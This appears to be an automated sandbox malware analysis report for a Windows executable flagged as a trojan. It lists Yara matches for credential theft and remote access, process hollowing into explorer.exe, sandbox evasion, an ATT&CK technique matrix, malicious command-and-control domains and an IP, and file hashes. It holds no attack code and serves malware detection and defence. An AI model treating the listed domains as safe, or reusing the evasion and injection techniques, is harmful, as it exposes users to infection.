          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match, File source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match, File source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Shared Modules | Path Interception | 612 Process Injection | 1 Rootkit | 1 Credential API Hooking | 221 Security Software Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Masquerading | 1 Input Capture | 2 Process Discovery | Remote Desktop Protocol | 1 Input Capture | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Disable or Modify Tools | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Archive Collected Data | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 31 Virtualization/Sandbox Evasion | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 612 Process Injection | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 112 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 2 Software Packing | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Behavior Graph ID: 838418, Sample: ClbrTLBbVA.exe, Startdate: 30/03/2023, Architecture: WINDOWS, Score: 100
          DNS/IP: www.dafabetvn.info; dafabetvn.info
          Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures
          Process tree:
          ClbrTLBbVA.exe (started)
            Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
            Dropped: C:\Users\user\AppData\...\ClbrTLBbVA.exe.log, ASCII
            ClbrTLBbVA.exe (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              explorer.exe (injected)
                Signatures: System process connects to network (likely due to code injection or exploit)
                DNS/IP: adornmentwithadrienne.com 66.235.200.145, 49698, 80 CLOUDFLARENETUS United States; www.adornmentwithadrienne.com
                colorcpl.exe (started)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                  cmd.exe (started)
                    conhost.exe (started)
            ClbrTLBbVA.exe (started)

          Source | Detection | Scanner | Label | Link
          ClbrTLBbVA.exe | 32% | ReversingLabs | Win32.Trojan.Olock |
          ClbrTLBbVA.exe | 48% | Virustotal | | Browse
          ClbrTLBbVA.exe | 100% | Joe Sandbox ML | |

          No Antivirus matches

          Source | Detection | Scanner | Label | Link | Download
          11.2.ClbrTLBbVA.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

          Source | Detection | Scanner | Label | Link
          adornmentwithadrienne.com | 1% | Virustotal | | Browse

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          dafabetvn.info | 15.197.142.173 | true | true | | unknown
          adornmentwithadrienne.com | 66.235.200.145 | true | true | | unknown
          www.adornmentwithadrienne.com | unknown | unknown | true | | unknown
          www.dafabetvn.info | unknown | unknown | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          www.theredorchard.co.uk/ne28/ | true | Avira URL Cloud: safe | low
                                unknown
                                http://www.groupetalentapro.com/ne28/www.poshcompanyandsuites.netexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.adornmentwithadrienne.com/ne28/?yXB=JRhSHgcolorcpl.exe, 0000000D.00000002.531041015.000000000505F000.00000004.10000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.greengrovetherapy.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.poshcompanyandsuites.netReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.dafabetvn.infoexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.11600yy.com/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.poshcompanyandsuites.net/ne28/www.hatchandneststudio.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.6pg.shop/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.adornmentwithadrienne.comReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.carterandcone.comlClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cnClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers/frere-jones.htmlClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.greengrovetherapy.com/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.forum-sanmonika.onlineexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.listestubenring.comReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.conviord.com/ne28/www.fren.petexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.jiyu-kobo.co.jp/ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.adornmentwithadrienne.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.geseconevent.com/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.dafabetvn.info/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.com/designers8ClbrTLBbVA.exe, 00000000.00000002.315431308.0000000006762000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.poshcompanyandsuites.net/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.11600yy.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.conviord.comReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.listestubenring.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fren.pet/ne28/explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.labishu.comReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.forum-sanmonika.online/ne28/www.11600yy.comexplorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.11600yy.comReferer:explorer.exe, 0000000C.00000002.541222355.000000000F41C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
IP:66.235.200.145
Domain:adornmentwithadrienne.com
Country:United States
ASN:13335
ASN Name:CLOUDFLARENETUS
Malicious:true
                                      Joe Sandbox Version:37.0.0 Beryl
                                      Analysis ID:838418
                                      Start date and time:2023-03-30 20:49:45 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 11m 1s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:17
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample file name:ClbrTLBbVA.exe
                                      Original Sample Name:441aa97af8ab929af47af76962584b02.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@10/2@2/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 76.1% (good quality ratio 69.6%)
                                      • Quality average: 72.1%
                                      • Quality standard deviation: 31.7%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 45
                                      • Number of non-executed functions: 130
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
20:50:55 | API Interceptor | 1x Sleep call for process: ClbrTLBbVA.exe modified
20:51:28 | API Interceptor | 404x Sleep call for process: explorer.exe modified
                                      Process:C:\Users\user\Desktop\ClbrTLBbVA.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1314
                                      Entropy (8bit):5.350128552078965
                                      Encrypted:false
                                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                      MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                      SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                      SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                      SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                      Malicious:true
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                      Process:C:\Windows\explorer.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):984
                                      Entropy (8bit):5.227423502376633
                                      Encrypted:false
                                      SSDEEP:24:Yq6CUXyhm5IUmtQlbNdB6hm5VUmtQlz0Jahm5SUmtQlHZ6T06Mhm5vUmtQlbxdB8:YqDUXycIwbNdUcpwz0JacWwHZ6T06Mcb
                                      MD5:D9512E54D33D06E68E0C0D36726F7776
                                      SHA1:2E2ED852C188E0F96FCF861D7B73B8C479379845
                                      SHA-256:C70B840F192B885EF63C8426B0667EF175424A96DEC79A988C9525AD8E6997D2
                                      SHA-512:AAFCD49F2C87D4D43076CB4C1357FFAC9AB224ADBD4CEB06961755A0D6305D550090DDA34CAAA3C9B2700EF182CC9D6000BAB87A1A31D15A6A9F7565F60BA515
                                      Malicious:false
                                      Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2360844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2350844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2340844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2330844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2320844864,"LastSwitchedHighPart":30747916,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2310844864,"LastSwitchedHighPart":30747916,"PrePopulated":true}]}
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.291489679553607
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:ClbrTLBbVA.exe
                                      File size:758784
                                      MD5:441aa97af8ab929af47af76962584b02
                                      SHA1:19179b5b35112d35d1b3514f1026663efb86ef37
                                      SHA256:1c4a23543bd6562ebedfbc5905ff87a87d06d25a03b1015043314e00befa54dd
                                      SHA512:4681ede637ced2a9d7d997a296fe3c1e8c889e9f95cf9c56d32aea5aa7434eaa20f3648fa9347012bab3f15feb8d020a1e152c8cf0ec3b9d158c1d6aefd611ec
